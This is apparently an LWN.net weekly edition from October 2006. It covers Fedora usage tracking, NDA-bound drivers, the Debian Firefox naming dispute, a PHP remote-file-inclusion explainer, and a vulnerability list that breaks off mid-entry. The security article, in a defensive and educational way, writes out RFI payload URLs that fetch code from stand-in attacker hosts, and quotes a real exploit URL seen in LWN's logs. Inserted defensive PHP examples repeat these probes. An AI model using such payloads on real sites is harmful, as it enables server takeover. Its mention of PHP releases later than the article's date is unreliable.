The Fedora Core 6 distribution is nearing release. Even after the
recently announced
delay, the
final version of FC6 is expected to hit the net on October 17. So one
would assume that there would be little call for controversial changes at
this time in the cycle; the Fedora folks would be expected to be concerned
with fixing the final problems and getting the release out the door. So
the documentation group was a little surprised, at the end of September,
when a
request to modify the Firefox
startup page showed up.
In particular, the Fedora leadership wanted that page to include a tracking
image - an image hosted on a Fedora web site which would allow the project to
track how many people were starting up Fedora's version of Firefox, and
which IP addresses they came from. It would appear that few people had any
sense that there might be objections to this technique; the resulting
discussion seemed to take them by surprise. But a discussion did result,
focusing on a few questions: why does Fedora want to track its users, why
the hurry to get this change into FC6, and isn't there a better way?
At the moment, it seems, the Fedora Project has very little idea of how
widely used their work is. That is an ignorance they share with a great
many free software projects, but Fedora's situation, it seems, has the
potential to make that ignorance expensive. The best description of Fedora's motives came from
Greg DeKoenigsberg; it is worth quoting at length:
Really, this question should be asked this way: "are metrics so
important that you're ready to risk alienating some users and
contributors to get them?" And the answer to that question, from
my perspective, is "yes".
Why? Because, like it or not, every funding conversation inside of
Red Hat's walls begins and ends with metrics. If it isn't
measurable, it doesn't exist. Fact.
This is especially important in the case of Fedora, because Fedora
doesn't make any money directly for Red Hat. We continue to
develop Fedora because it serves other purposes. Research and
development. Quality Assurance for RHEL. The ethics of continuing
to provide free software, which is important to all of us. And,
most importantly from my own perspective, *community mindshare*.
If we can't quantify Fedora's mindshare in some way, we lose one of
the *major* rationales for making the Fedora Project stronger and
more independent. Every time a Red Hat executive asks "how many
Fedora users are out there?" and we answer "oh, somewhere between
100k and a few million," we make it *that* much more difficult to
defend Fedora from bad Red Hat decisions. If a Red Hat executive
has to choose between giving resources to RHEL and giving resources
to Fedora, and if he's got dollar figures on one side of the ledger
and hand-wavy "mindshare" guesses on the other side of the ledger,
he's going to choose RHEL. Every single time. I've seen it
happen, again and again and again and again. And again.
Fedora has, slowly over the years, become a more open and transparent free
software project. It is also clearly a successful project, with a large
(if unknown) number of users worldwide. But the fact remains that Fedora
is a Red Hat project, with Red Hat being the source of almost all of the
funding that keeps Fedora going. This funding is a generous gift from Red
Hat to the community (though Red Hat certainly benefits from it as well),
but it puts Fedora into a strongly dependent position. Fedora must
keep Red Hat happy, and convince Red Hat of its importance, if it is to
continue to be funded properly.
According to Max Spevack, there is no
concern about Fedora funding being cut; this exercise is, instead, about getting that
funding increased. But the evident level of concern belies that claim
somewhat. Even if there is no discussion of cutting Fedora funding now, it
seems like a subject which could come up in the future. Red Hat is
becoming just another company in many ways, and it will make the calculations that
companies need to make to survive. It would not take too many bad quarters
for Red Hat to start looking very hard at the money spent on Fedora;
managers under pressure to improve their numbers can be very short-sighted
at times. So it makes sense for the Fedora project to be concerned about its
ongoing relationship with Red Hat.
It almost seems that something must have happened to reinforce this idea in
the minds of the Fedora leadership. If so, they aren't talking about it.
But they have decided that it is important to get some sort of mechanism
into FC6 which would give them at least rudimentary statistics. Waiting
another cycle for FC7, it seems, is not an option. Given the short time
available to put anything into FC6, the Fedora folks settled quickly
on something which would be easy to implement: a tracking image.
There are obvious problems with the tracking image idea, starting with the
privacy concerns. Not everybody wants to be tracked in this way. People
with this sort of concern may also not be much comforted by the Fedora privacy
policy page, which leads off with this text:
THIS IS A DRAFT. It may not represent the final document, and
should not be used for anything other than informational purposes.
Beyond that, it has been pointed out that this technique only yields IP
addresses, which will only be correlated with the number of actual
installations in a very rough manner. But that information, it seems, is
much better than nothing.
There are alternatives. One idea which has been discussed is a brief user
survey which shows up at the end of the installation process. Users could
then provide some information - or, crucially, choose not to. Nobody seems
to think that such a mechanism could be added to FC6 at this late date,
however; though it could show up in FC7.
The Fedora folks could also take advantage of the fact that a new Fedora
installation already phones home. It is all for the best of purposes: the
yum-updatesd daemon, which runs by default, goes to the central
Fedora server to download the lists of repository mirrors. The project has
not been using the tracks that this activity leaves - but they could. Greg
describes it as "an absolute no-brainer":
The rich irony here, of course, is that rather than tell users
we're tracking them, we will instead be able to track them
invisibly through the normal operation of their systems. But I'm
perfectly happy either way, so.
This approach is not perfect either. It fails on systems which are offline,
while every system running Firefox has a high probability of being
connected. It also cannot distinguish systems which are likely to be
"desktop" systems - information which is apparently of interest. But it's
there now and, as Greg points out, it doesn't seem to set off alarms the
way a tracking image would. Hopefully Fedora will share the conclusions it
draws from this data - and make good use of it to convince Red Hat
management of the project's importance.
Comments (84 posted)
Anybody who has been working with free software for any period of time
knows that hardware support is often one of the community's thorniest
problems. Manufacturers are often reluctant to
tell their customers how to actually use the hardware they sell. For some strange
reason, people buy that hardware anyway, and promptly want it to work with
their operating system of choice. If that system is Windows, the
manufacturer will usually provide a driver (of uncertain quality). Free
software users, instead, are usually on their own.
The situation is better now than it often has been in the past; free
operating systems support a wide variety of hardware. In many cases, the
vendors have given in and simply released programming information required
for anybody to write a driver. In many others, however, this information
is provided to a specific company or developer under a non-disclosure
agreement (NDA), with the understanding that the resulting driver would then be
released under a free license. This approach has, beyond a doubt, made
more drivers available for use with our systems; it has become a common way
of doing things, especially in the Linux world.
Not everybody is happy with this state of affairs, however. OpenBSD founder Theo de Raadt has started a
campaign against the practice of writing drivers under NDA; in the process, he has
stepped on, if anything, more than the usual number of toes, to the point
that some of the people involved are now refusing to talk to him. Theo's
tactics are never subtle, but he does have a point which is worth listening
to.
At a first glance, a driver developed under NDA seems like a good thing.
It is free software, after all, and it makes the device work under the
target operating system. But these drivers can be problematic for the simple
reason that they do not document the hardware the way the specification
does. Without that documentation, many of the benefits of free software
are lost.
In many cases, only the original author can maintain a driver developed
under NDA. Nobody else has the documentation required to make any real
changes to how the driver operates; nobody else really understands the
device. Whenever a new version of the hardware
comes out, or whenever somebody needs a feature that the original author
didn't see fit to implement, one can only hope that said author is still
around and in a mood to work on that driver.
This situation can be worse yet if the author who signed the NDA writes
poor quality code, full of constants whose meaning is clear to nobody. In
some cases, the vendor may require that the driver be written in that way
in order to expose as little information about the hardware as possible.
It's worth noting that this is a problem associated with poor hardware
documentation in general. Your editor recently had cause to dig into the
OmniVision OV7x20 sensor driver. The data
sheet for this device
can be found by anybody with access to a search engine, but that data sheet
is little help for anybody trying to understand this code:
/* Settings for (color) OV7620 camera chip */
static struct ovcamchip_regvals regvals_init_7620[] = {
    { 0x12, 0x80 }, /* reset */
    { 0x00, OV7620_DFL_GAIN },
    { 0x01, 0x80 },
    { 0x02, 0x80 },
    { 0x03, OV7620_DFL_SAT },
    { 0x06, OV7620_DFL_BRIGHT },
    { 0x07, 0x00 },
    { 0x0c, 0x24 },
    { 0x0c, 0x24 },
    { 0x0d, 0x24 },
    /* ... 45 lines of this stuff removed ... */
    { 0x74, 0x00 },
    { 0x75, 0x8e },
    { 0x76, 0x00 },
    { 0x77, 0xff },
    { 0x78, 0x80 },
    { 0x79, 0x80 },
    { 0x7a, 0x80 },
    { 0x7b, 0xe2 },
    { 0x7c, 0x00 },
    { 0xff, 0xff }, /* END MARKER */
};
It's not clear that anybody really knows what all those register
settings do; they involve a number of bits and registers which are marked
"reserved" in the documentation. For all practical purposes, they
constitute a form of opaque
firmware which must be loaded into the device for it to operate correctly.
Pain will come to anyone who attempts anything more than the most trivial
tweaks to these values.
Similar issues (in an entirely different context) recently led Linus
Torvalds to exclaim:
And we should tell all hardware companies that firmware tables are
stupid, and that we just want to know what the hell the registers
MEAN!
Without complete hardware documentation, we will
not understand what our peripherals are doing.
Finally, a big problem with drivers written under NDA is that they only
work on one system, and they can be very little help for anybody trying to
make the device work on a different kernel. That, of course, has a lot to
do with why there is a lot of criticism of this approach coming from the
BSD world while the Linux community tends to be more accepting of it. It
is probably safe to say that most developers who are able to get this sort
of access to documentation are working on Linux drivers. If we were
pounding our heads against our monitors in an attempt to reverse-engineer
hardware by way of obscure BSD drivers written under NDA, we might see the
situation in a different light.
Theo has picked out two targets for special attention: Intel and the One
Laptop Per Child (OLPC) project. Intel has gotten a fair amount of good
press supporting its hardware under Linux. The truth of the matter,
however, is that a number of drivers for Intel hardware are written
in-house, with little or no hardware documentation provided to the
community. As long as Intel
remains interested in maintaining those drivers, things will work well
enough - for Linux users. BSD users are not so lucky, however, and we may
all be out of luck if a change of management or focus at Intel causes the
company to drop its Linux drivers. If Intel truly wants to be known as an
open-source friendly company, it would do well to make its hardware truly
open. The OpenBSD developers are currently running a campaign aimed at pushing Intel in
that direction.
| Disclosure time |
| Readers of this article should be aware that your editor is in the final stages of writing a GPL-licensed driver for the OLPC camera controller - and that he signed an NDA to obtain the requisite hardware documentation. As a result, he is, according to Theo de Raadt, "part of the problem." |
In the OLPC case, Theo's criticism has been
centered upon (but not limited to) the driver for the Marvell wireless
networking chip. Some very special things are being done with wireless on
the OLPC, with the result that it will be able to function as a mesh
network router with the CPU powered down. Enabling this involves a lot of
close work with the chipset manufacturer - and a driver written under NDA.
There are other NDA-covered drivers on the OLPC as well.
Theo is unhappy that the OLPC will be, as he sees it, a closed system for
OpenBSD. [Mr. de Raadt has taken exception to the previous
sentence, consider it removed].
But Theo is even more unhappy because, in his view, the OLPC
project has squandered an opportunity to use its economic power
with the manufacturers to force the hardware documentation out into the
open. This failure is not just a lost opportunity; to Theo it also sends a
message to other vendors that they need not worry about releasing hardware
documentation. So, he says, the OLPC folks have not only failed to do the
best they could; they have also actively made things worse for the free
software community as a whole.
The OLPC folks have several responses to this
criticism. The arrangement they have now, they say, is the best they could
achieve within their particular set of goals - which, it should be
remembered, is the provision of economical computers to children worldwide.
OLPC was not founded with the primary goal of helping the free software community,
though, in fact, that has been the result of much of its work. OLPC
developers make the point that this computer will be one of the most open
systems built in many years. The BIOS is free software, as is the VSA microcode
which implements x86 emulation on the Geode CPU. The system's SD
controller was redesigned (by Marvell) for the express purpose of
allowing a driver to be written for it without having to sign the SD
Association's particularly unpleasant NDAs. Even the firmware blob which
runs on the wireless processor is slated for replacement with free software
- though that code does not exist at this point.
Meanwhile, work continues on getting the hardware documentation released.
It should be remembered, however, that much of this hardware does not
actually exist yet. It would be rare indeed for a manufacturer to openly
release this sort of information for a product which is not yet generally
available. OLPC's plan appears to be to continue to work with the vendors
to get the documentation released as the hardware comes onto the market.
Heavy-handed pressure tactics, they feel, would be counterproductive in the
end.
The crux of the matter, thus, is this: if we accept that the community
needs open hardware documentation to function as it should, what is the
best way to get vendors to release that documentation? Some groups
encourage ongoing engagement with these companies, with the intent of
guiding them toward open source enlightenment. Under this line of
thought, these companies will come to realize that the community will do
great things with their hardware - growing the market - given the right
information; they will see that it is in their economic interest to make
the documentation available.
The contrary argument is that this approach has never worked well, that
hardware companies will never be brought around in this way. What is
required, instead, is an intransigent insistence that the documentation
must be released from the outset, and a refusal to sign NDAs to get it.
Only when the vendors see themselves locked out of the free software market
entirely will they realize that their interest lies in openness, not
secrecy. Until that time, there is no reason to cooperate with
uncooperative vendors; the preferred approach, instead, would appear to be
to attempt to shame them publicly.
There has been enough history of drivers written under NDA that it should
be possible to come to some sort of conclusion as to which approach is more
effective. The OpenBSD camp has arguably had some high-profile success
with the public shame approach. Corporate conversions through quiet
engagement tend to be more, say, quiet, however. Your editor would be most
interested to hear about examples of companies changing their approach to
hardware documentation as a result of working with free software developers
under NDA. The question is not just academic: if we want to bring about an
improvement in the hardware documentation situation, it behooves us to
understand which tactics work best.
Comments (46 posted)
Steven J. Vaughan-Nichols is a mainstream technology reporter who has often
shown a reasonably high level of clue regarding the free software
community. A recent article, titled
Open Source
Madness!, shows where that clue ends, however. More to the point, it
shows an area where the free software community is having a hard time
making itself understood.
The article in question takes issue with the Debian project's plan to drop
Firefox from etch (see this LWN
article from September for more information), and with the existence of Gnuzilla and Iceweasel,
which are versions of the Mozilla suite and Firefox browser which are
intended to be truly freely redistributable.
Mr. Vaughan-Nichols presents
the issue as being only about logos, calls the Debian developers
"fundamentalists," and states:
By winning this "battle," the pedantic Debian developers have
helped the proprietary forces of Microsoft and friends far more
than the cause of Open Source.
So why is it that the Debian developers have done this terrible thing?
Maybe it is time to look at the reasoning behind this move.
The logo issue is real. It is provided under terms which are not
compatible with the Debian Free Software Guidelines, and, as a result,
cannot be shipped with the core Debian release. For some time, Debian was
able to ship a version of Firefox without the logo, but Mozilla Corporation
has called an end to that. As a result, Debian is in the position of being
asked to ship something it sees as non-free.
The logo issue might be enough to push Firefox out of a distribution like
Debian, but there are more serious issues as well. The Mozilla
trademark policy only allows a distributor to ship "Firefox" if it is
an unmodified copy of what the Mozilla people have released. Some
relatively trivial changes are allowed if the distributor calls the result
the "Firefox Community Edition"; anything beyond that cannot use the name
"Firefox" at all. The only exception is if explicit permission has been
obtained from the Mozilla Corporation prior to distribution.
Distributors often do want to make changes to Firefox - just like they
change many other programs they ship. At a minimum, they often want to
apply their own security fixes, since Mozilla's approach to security
patches tends to be rather distributor-hostile. Having Mozilla review
every patch as required will slow the process down, even if there are no
disagreements about specific changes. This policy makes it hard to provide
quick security updates to Firefox; this matters, especially, when a
distributor is trying to maintain a version of the browser that Mozilla
Corp. has long since abandoned.
Perhaps most important, however, is this: even if a distributor gets
permission to ship a specific modified version of Firefox, there is nothing
which automatically gives anybody else that permission. Using one
distribution as a base for another is a time-honored practice in the Linux
community; there are, in fact, very few distributions out there which were
truly started from scratch. But what is a distribution based on (say)
Debian to do with a modified version of Firefox? The creator of the
derived distribution has no permission from Mozilla Corporation to
distribute that modified version - even if no further changes are made.
The presence of this modified package creates a trap which any second-stage
distributor must find and defuse; it makes the distribution less
redistributable, less free.
In the end, however, Mozilla's code is free software; all that is needed to
avoid all of this trouble is to change its name. That is just what Debian
is doing - and other distributors may yet follow suit.
Mr. Vaughan-Nichols fears that this change will confuse users and send them
screaming back to the comfort and stability of Windows. It would seem that
the "Firefox" trademark has become so important that we must use it, or the
dream of World Domination on the desktop will come to an untimely and
ignominious end. "Freedom," says the article, "trumps
common sense."
The problem is, freedom is what this is all about. There would appear to
be an increasing number of people who are calling for the community to
"bend a little" on freedom in the name of winning the desktop battle. It
may (or may not) be true that Linux could advance more quickly on the
desktop if it were to become more like Windows. But what would be the
point? If the choice is forced upon us, it would seem better to dispense
with an overly-controlled name and keep our desktop free, supportable, and
redistributable.
Comments (21 posted)
Page editor: Jonathan Corbet
Security
October 11, 2006
This article was contributed by Jake Edge.
A recent rash of reports to the bugtraq mailing list provides a
nice confirmation of an
article on this page two
weeks ago. Google recently released a
code search tool
that is being used to find security holes in open source projects and
the first target appears to be remote file inclusion (RFI) vulnerabilities in
PHP programs. There has been a steady stream of vulnerability reports on
security mailing lists as well as an increase in attempts to exploit them.
An attacker's fondest wish is to be able to run their code on the
target system; an RFI exploit does just that. By exploiting two very
dubious 'features' of the PHP language, an attacker can inject their code into
a PHP program on the server. Once they can do that, they can access
anything that the PHP program could: databases, password files, etc. They
can install their own shell running with the privileges of the web server
user (such as 'apache' or 'httpd') and if the server has not been patched
for some local user privilege escalation vulnerability, the shell could be used
to become the root user.
PHP is particularly susceptible to this kind of exploit because the default
installation allows filesystem operations to 'automagically' open URLs as
if they were local files (governed by the allow_url_fopen
configuration parameter). This capability even extends to operations
which, one would think, should be restricted to the local filesystem, such
as the include and require directives. If an attacker can manipulate the
arguments to those directives, they can supply a URL under their control
as the argument; that is just what an RFI exploit does.
Consider the following:
include($base_path . "/foo.php");
If an attacker can control the value of the base_path variable, they can
replace it with something like "http://example.com/badcode?foo=" and,
instead of picking up foo.php from the local filesystem, PHP will happily
reach out across the net to pick up the attacker's code. One of the ways
that an attacker can control the value of a variable in a PHP program is
through the use of the register_globals PHP mis-feature.
When register_globals is enabled in PHP, the language 'automagically'
instantiates variables with values from the HTTP request and puts them in the
namespace of the PHP program. This was originally seen as a nice convenience
for getting the FORM values from the page, but has since been deprecated and is
disabled by default. There are still a fair number of PHP programs that
require it to be enabled in order to function correctly; with luck this
number is decreasing, hopefully rapidly. When it is enabled,
it allows an attacker to inject a value for any uninitialized variable in
the program by simply adding it as a GET parameter at the end of the URL.
Using the example above, if base_path was uninitialized in some
installations (for instance where the application was installed in the
DocumentRoot), an attacker could request:
http://vulnerable.com/RFI.php?base_path=http://example.com/badcode?foo=
and PHP will fetch and execute the exploit code. The final question mark
and foo= in the URL are there only to absorb the "/foo.php" that the
include directive appends, turning it into a harmless query string on the
attacker's server. Other techniques are possible, such as using %00 to put
a NUL byte at the end of the malicious URL; PHP releases before 5.3.4
truncate the path at the NUL, while later releases reject such paths
outright.
Some PHP programmers are not content with being exploitable only when
register_globals is on and have put code like the following into
their applications:
include($_REQUEST['own_me'] . '/foo.php');
The _REQUEST 'superglobal' array in PHP stores all of the variables that
come in from the HTTP request, regardless of whether they come as a GET or
a POST variable (and, with the default variables_order, cookies as well).
This one is easy to exploit by making a request like:
http://vulnerable.com/RFI2.php?own_me=http://example.com/badcode%00
By disabling both register_globals and allow_url_fopen, these kinds of
exploits can be avoided. Unfortunately, the latter also alters the behavior
of filesystem functions that might more legitimately be used to fetch
remote URLs. For this reason it is enabled by default, and some PHP
applications do not function properly with it disabled. (PHP 5.2.0,
released in November 2006, splits the include/require case out into a
separate allow_url_include directive, off by default, so that URL includes
can be disabled without losing fopen() on URLs.) There have been too many
exploitable uses of register_globals over the years for any security-minded
PHP programmer to even consider enabling it. Other languages may also be
susceptible to this kind of exploit, but PHP is certainly the target of the
recently reported ones.
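The include() patterns discussed above, placed beside a hardened replacement, as an added example written for this edit rather than code from the article or from any PHP project. It assumes a module directory containing home.php, and the module names home and help are illustrative; the $own_me parameter mirrors the _REQUEST example above. The configuration check looks at allow_url_include, the directive that governs include/require of URLs from PHP 5.2.0 on, alongside register_globals:

```php
<?php
// Added example (not code from the LWN article or from any PHP project): the
// include() patterns discussed above next to a hardened replacement. Module
// names, file names and the $own_me parameter are illustrative.

// VULNERABLE: request data reaches include() as a path prefix, mirroring
// include($_REQUEST['own_me'] . '/foo.php'). Whether PHP fetches a "http://..."
// value here is governed by allow_url_fopen (PHP 5.1 and earlier) or by
// allow_url_include (its own directive since PHP 5.2.0, default Off).
function vulnerable_include(string $own_me)
{
    return include($own_me . '/foo.php');
}

// HARDENED: the request supplies a key, the key selects a file from a fixed
// table, and the resolved path is checked to lie inside the module directory.
const MODULES = ['home' => 'home.php', 'help' => 'help.php'];

function resolve_module(string $requested, string $module_dir): string
{
    if (!array_key_exists($requested, MODULES)) {
        throw new InvalidArgumentException(
            'unknown module: ' . addcslashes($requested, "\0..\37"));
    }
    $dir  = realpath($module_dir);
    $real = realpath($module_dir . DIRECTORY_SEPARATOR . MODULES[$requested]);
    // realpath() collapses "..", follows symlinks and returns false for a
    // missing file, so a prefix comparison against the real directory is
    // meaningful. A NUL byte or a URL can never reach this point: neither is
    // a key of MODULES.
    if ($dir === false || $real === false
        || strpos($real, $dir . DIRECTORY_SEPARATOR) !== 0) {
        throw new RuntimeException("module file missing or outside $module_dir");
    }
    return $real;
}

// The directives the article names, plus allow_url_include. ini_get() returns
// false for a directive this PHP build does not know (register_globals was
// removed in PHP 5.4), which filter_var() treats as off.
function rfi_config_warnings(): array
{
    $warnings = [];
    foreach (['register_globals', 'allow_url_include'] as $directive) {
        if (filter_var(ini_get($directive), FILTER_VALIDATE_BOOLEAN)) {
            $warnings[] = "$directive is On; set it Off in php.ini";
        }
    }
    return $warnings;
}

if (PHP_SAPI === 'cli') {
    // Stand-alone demo: throwaway module directory, one good request, then the
    // RFI URL, a NUL-terminated traversal, and an allowlisted but missing file.
    $dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'rfi_demo_' . getmypid();
    mkdir($dir);
    file_put_contents($dir . DIRECTORY_SEPARATOR . 'home.php',
                      "<?php return 'home module loaded';\n");

    $loaded = include resolve_module('home', $dir);
    echo "ok: $loaded\n";
    foreach (['http://attacker.example/badcode?', "../../etc/passwd\0", 'help'] as $bad) {
        try {
            resolve_module($bad, $dir);
        } catch (Exception $e) {
            echo 'rejected: ', $e->getMessage(), "\n";
        }
    }
    foreach (rfi_config_warnings() as $w) {
        echo "warning: $w\n";
    }
    unlink($dir . DIRECTORY_SEPARATOR . 'home.php');
    rmdir($dir);
}
```

The point of the allowlist is that no string from the request is ever used as a path; the realpath() prefix check is a second line of defence against a module table that is itself edited carelessly, and it rejects a listed-but-missing file rather than letting include() fall back to include_path.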
[Editor's note: the LWN server is currently seeing exploit attempts at a
rate of nearly one per second, using URLs like:
http://lwn.net/Articles//master.php?root_path=http://webstorch.com//cap.txt?
No, it doesn't work here - but using wget to fetch the exploit file can
be instructive. There is a steady stream of file inclusion vulnerability
reports on lists like Bugtraq; if you are using PHP-based software, it
behooves you to pay attention.]
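As an added example (not code from the article), a PHP command-line scanner that applies the checks a log reviewer would want after reading the editor's note, run over a handful of constructed combined-format access log lines. The 10.0.0.x addresses and the hosts attacker.example and www.example.org are made up; the master.php request reproduces the URL shape quoted in the note. A remote URL in a parameter is flagged at low confidence, since search forms legitimately carry URLs; the truncation tricks the article describes, a trailing question mark or an embedded NUL, raise it to high:

```php
<?php
// Added example, not code from the LWN article: scan Apache combined-format
// access log lines for the remote-file-inclusion probes described above. The
// log lines are constructed; 10.0.0.x, attacker.example and www.example.org
// are illustrative (webstorch.com is the host quoted in the editor's note).

const SAMPLE_LOG = <<<'LOG'
10.0.0.7 - - [11/Oct/2006:10:01:02 +0000] "GET /index.php?page=home HTTP/1.1" 200 1423 "-" "Mozilla/5.0"
10.0.0.9 - - [11/Oct/2006:10:01:03 +0000] "GET /Articles//master.php?root_path=http://webstorch.com//cap.txt? HTTP/1.0" 404 312 "-" "libwww-perl/5.805"
10.0.0.9 - - [11/Oct/2006:10:01:04 +0000] "GET /RFI2.php?own_me=http%3A%2F%2Fattacker.example%2Fbadcode%00 HTTP/1.0" 404 312 "-" "libwww-perl/5.805"
10.0.0.11 - - [11/Oct/2006:10:01:05 +0000] "GET /search.php?q=http%3A%2F%2Fwww.example.org%2F HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
10.0.0.12 - - [11/Oct/2006:10:01:06 +0000] "GET /index.php?page=..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1" 404 312 "-" "curl/7.15"
LOG;

// Client address, request target and status code from a combined-format line.
const LINE_RE = '/^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) HTTP\/[\d.]+" (\d{3})/';

// Inspect one request target. Returns [] for a clean request, otherwise the
// reasons and a confidence level. A remote URL in a parameter is only "low"
// on its own (search forms carry URLs legitimately); the truncation tricks the
// article describes (a trailing "?" or an embedded NUL) make it "high".
function classify_request(string $target): array
{
    $qpos = strpos($target, '?');
    if ($qpos === false) {
        return [];
    }
    $reasons = [];
    $confidence = 'low';
    foreach (explode('&', substr($target, $qpos + 1)) as $pair) {
        [$name, $value] = array_pad(explode('=', $pair, 2), 2, '');
        $decoded = rawurldecode($value);          // %00 becomes a real NUL here
        $has_nul = strpos($decoded, "\0") !== false;
        if ($has_nul) {
            $reasons[] = "$name: NUL byte (path truncation)";
            $confidence = 'high';
        }
        if (preg_match('#^(?:https?|ftp)://#i', $decoded)) {
            $reasons[] = "$name: remote URL";
            if ($has_nul || substr($decoded, -1) === '?') {
                $confidence = 'high';
            }
        }
    }
    return $reasons === [] ? [] : ['reasons' => $reasons, 'confidence' => $confidence];
}

// Run classify_request() over every line and keep the hits.
function scan_log(string $log): array
{
    $hits = [];
    foreach (preg_split('/\R/', trim($log)) as $line) {
        if (!preg_match(LINE_RE, $line, $m)) {
            continue;                              // not a request line we parse
        }
        [, $ip, $target, $status] = $m;
        $verdict = classify_request($target);
        if ($verdict !== []) {
            $hits[] = ['ip' => $ip, 'status' => $status, 'target' => $target] + $verdict;
        }
    }
    return $hits;
}

// Attempts per source address, highest first: the editor's note describes a
// near-continuous stream, so the per-IP count is the figure worth watching.
function count_by_ip(array $hits): array
{
    $counts = [];
    foreach ($hits as $h) {
        $counts[$h['ip']] = ($counts[$h['ip']] ?? 0) + 1;
    }
    arsort($counts);
    return $counts;
}

if (PHP_SAPI === 'cli') {
    $hits = scan_log(SAMPLE_LOG);
    foreach ($hits as $h) {
        printf("%-10s %-4s %-3s %s\n    %s\n", $h['ip'], $h['confidence'],
               $h['status'], $h['target'], implode('; ', $h['reasons']));
    }
    print_r(count_by_ip($hits));
}
```

On the sample input the master.php and RFI2.php probes come out high, the search.php request low, and the NUL-terminated path traversal high; to run it over a real log, replace SAMPLE_LOG with the contents of the access log. A 404 on a high-confidence hit means the probed script is not installed; a 200 is the line to investigate.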
Comments (12 posted)
New vulnerabilities
awstats: input sanitizing
| Package(s): | awstats |
| CVE #(s): | CVE-2006-3681, CVE-2006-3682 |
| Created: | October 10, 2006 |
| Updated: | October 11, 2006 |
| Description: | awstats did not fully sanitize input, which was passed directly to the user's browser, allowing for an XSS attack. If a user was tricked into following a specially crafted awstats URL, the user's authentication information could be exposed for the domain where awstats was hosted. (CVE-2006-3681) awstats could also display its installation path under certain conditions; this is only likely to be a concern if awstats is installed into a user's home directory. (CVE-2006-3682) |
| Alerts: | |
Comments (1 posted)
maxdb: arbitrary code execution
| Package(s): | maxdb |
| CVE #(s): | CVE-2006-4305 |
| Created: | October 5, 2006 |
| Updated: | October 11, 2006 |
| Description: | Version 7.5.00 of the MaxDB database has a vulnerability in the WebDBM frontend. Insufficient input sanitization is performed on data passed to the frontend, resulting in the possible execution of arbitrary code. |
| Alerts: | |
Comments (2 posted)
OpenSSH: denial of service
| Package(s): | openssh |
| CVE #(s): | CVE-2006-4925, CVE-2006-5052 |
| Created: | October 6, 2006 |
| Updated: | November 15, 2007 |
| Description: | packet.c in ssh in OpenSSH allows remote attackers to cause a denial of service (crash) by sending an invalid protocol sequence with USERAUTH_SUCCESS before NEWKEYS, which causes newkeys[mode] to be NULL. (CVE-2006-4925) An unspecified vulnerability in portable OpenSSH before 4.4, when running on some platforms, allows remote attackers to determine the validity of usernames via unknown vectors involving a GSSAPI "authentication abort." (CVE-2006-5052) |
| Alerts: | |
Comments (none posted)
php: integer overflow
| Package(s): | php |
| CVE #(s): | CVE-2006-4812 |
| Created: | October 5, 2006 |
| Updated: | October 30, 2006 |
| Description: | The PHP memory handling routines have an integer overflow vulnerability. A remote attacker can use a script to cause memory allocation based on untrusted data, allowing arbitrary code to be executed as the apache user. |
| Alerts: | |
Comments (1 posted)
python: arbitrary code execution
| Package(s): | python |
| CVE #(s): | CVE-2006-4980 |
| Created: | October 6, 2006 |
| Updated: | November 7, 2006 |
| Description: | Benjamin C. Wiley Sittler discovered that Python's repr() function did not properly handle UTF-32/UCS-4 strings. If an application uses repr() on arbitrary untrusted data, this could be exploited to execute arbitrary code with the privileges of the python application. |
| Alerts: | |
Comments (1 posted)
Updated vulnerabilities
apache: cross-site scripting
| Package(s): | apache |
| CVE #(s): | CVE-2006-3918 |
| Created: | August 9, 2006 |
| Updated: | April 4, 2008 |
| Description: | From the Red Hat advisory: "A bug was found in Apache where an invalid Expect header sent to the server was returned to the user in an unescaped error message. This could allow an attacker to perform a cross-site scripting attack if a victim was tricked into connecting to a site and sending a carefully crafted Expect header." |
| Alerts: | |
Comments (none posted)
bind: denial of service
| Package(s): | bind |
| CVE #(s): | CVE-2006-4095, CVE-2006-4096 |
| Created: | September 7, 2006 |
| Updated: | February 1, 2007 |
| Description: | Bind has two denial of service vulnerabilities. Queries to recursive servers for SIG records will trigger an assertion failure if more than one RRset is returned. (CVE-2006-4095) An INSIST failure can be triggered by sending a large number of recursive queries. (CVE-2006-4096) |
| Alerts: | |
Comments (none posted)
binutils: buffer overflow
| Package(s): | binutils |
| CVE #(s): | CVE-2005-4807 |
| Created: | August 17, 2006 |
| Updated: | October 19, 2006 |
| Description: | The GNU assembler (gas) in binutils is vulnerable to a buffer overflow. If a user can be tricked into assembling a specially crafted file with gcc or gas, arbitrary code can be executed with the privileges of the user. |
| Alerts: | |
Comments (3 posted)
busybox: insecure password generation
| Package(s): | busybox |
| CVE #(s): | CVE-2006-1058 |
| Created: | May 5, 2006 |
| Updated: | May 2, 2007 |
| Description: | The BusyBox 1.1.1 passwd command does not use a proper salt when hashing passwords, so a brute-force attack on the resulting password hashes can take very little time. |
| Alerts: | |
Comments (2 posted)
bzip2: race condition and infinite loop
| Package(s): | bzip2 |
| CVE #(s): | CVE-2005-0953, CVE-2005-1260 |
| Created: | May 17, 2005 |
| Updated: | January 10, 2007 |
| Description: | A race condition in bzip2 1.0.2 and earlier allows local users to modify the permissions of arbitrary files via a hard-link attack on a file while it is being decompressed, since bzip2 changes the output file's permissions only after decompression is complete. (CVE-2005-0953) Specially crafted bzip2 archives may also cause an infinite loop in the decompressor. (CVE-2005-1260) |
| Alerts: | |
Comments (2 posted)
capi4hylafax: missing input sanitizing
| Package(s): | capi4hylafax |
| CVE #(s): | CVE-2006-3126 |
| Created: | September 1, 2006 |
| Updated: | October 18, 2006 |
| Description: |
Lionel Elie Mamane discovered a security vulnerability in capi4hylafax,
tools for faxing over a CAPI 2.0 device, that allows remote attackers to
execute arbitrary commands on the fax receiving system.
Comments (none posted)
cheesetracker: buffer overflow
| Package(s): | cheesetracker |
| CVE #(s): | CVE-2006-3814 |
| Created: | September 4, 2006 |
| Updated: | October 27, 2006 |
| Description: |
Luigi Auriemma discovered a buffer overflow in the loading component
of cheesetracker, a sound module tracking program, which could allow a
maliciously constructed input file to execute arbitrary code.
Comments (1 posted)
cpio: arbitrary code execution
| Package(s): | cpio |
| CVE #(s): | CVE-2005-4268 |
| Created: | January 2, 2006 |
| Updated: | March 17, 2010 |
| Description: |
Richard Harms discovered that cpio did not sufficiently validate file
properties when creating archives. Files with, e.g., a very large size
caused a buffer overflow. By tricking a user or an automatic backup
system into putting a specially crafted file into a cpio archive, a
local attacker could probably exploit this to execute arbitrary code
with the privileges of the target user (which is likely root in an
automatic backup system).
Comments (none posted)
vixie-cron: privilege escalation
| Package(s): | cron |
